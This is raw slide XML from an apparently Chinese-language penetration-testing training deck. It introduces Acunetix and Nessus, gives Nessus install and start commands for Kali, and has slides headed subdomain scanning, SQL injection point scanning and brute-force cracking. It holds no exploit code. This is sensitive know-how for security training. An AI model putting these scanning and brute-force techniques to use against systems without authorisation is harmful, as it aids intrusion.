              <a:t>8.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>智能爬行程序检测 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器类型和应用程序语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>检索并分析网站，包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>内容、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SOAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>10.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口扫描 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器并对在服务器上运行的网络服务执行安全检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>11.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可导出网站漏洞文件</a:t>
            </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35753341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11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2460305" y="2549442"/>
            <a:ext cx="11600793" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>软件主页面</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C8ED34-1556-4E10-BCB7-F8C50C552B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5420956" y="1226113"/>
            <a:ext cx="6108700" cy="3108325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27EF0326-06A1-4D17-B3FE-0ED23CA2ACD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5420956" y="4756570"/>
            <a:ext cx="6108700" cy="1883410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2460305" y="5467442"/>
            <a:ext cx="2031325" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发起端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2450379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一、介绍</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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="2255758"/>
            <a:ext cx="9788659" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13513868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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2302634"/>
            <a:ext cx="5085960" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>子域名扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行域名解析，找域名下的子域及其主机名（用于信息收集）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可选择使用操作系统默认配置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器或自定义的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B834ED6B-2663-4376-9A19-743194FC5F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5467610" y="2664752"/>
            <a:ext cx="6108700" cy="1214755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16975033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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648772" y="2731843"/>
            <a:ext cx="5085960" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入点扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8302A0D-DBD8-4DF5-9399-662BF14063CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4115759" y="1907507"/>
            <a:ext cx="6108700" cy="3208655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18645921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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648772" y="2731843"/>
            <a:ext cx="5085960" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>暴力破解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A19D1A5-B73B-4D8E-A7D2-F05181046A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3946720" y="2238828"/>
            <a:ext cx="6108700" cy="2641600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3883759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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648772" y="2008805"/>
            <a:ext cx="10631938" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>号称是世界上最流行的漏洞扫描程序，全世界有超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>75000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>不同于传统的漏洞扫描软件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可同时在本机或远端上遥控，进行系统的漏洞分析扫描。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也是渗透测试重要工具之一。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Nessus-5.2.6-debian6_i386.deb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nessusd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9981842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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3839841" y="1271350"/>
            <a:ext cx="10631938" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在浏览器中访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67E88A52-8C7E-474B-8005-BB3EC75048FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2026867" y="2008805"/>
            <a:ext cx="8303675" cy="4438409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D729713-5D45-48DF-9496-53D6962943D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2026867" y="3214650"/>
            <a:ext cx="8303674" cy="2026718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2063768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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3839841" y="1271350"/>
            <a:ext cx="10631938" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>新建扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11242D69-D632-4BB8-AC2B-3768ED91CE74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1248281" y="2146196"/>
            <a:ext cx="10081120" cy="4554319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1846100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漏洞扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3839841" y="1271350"/>
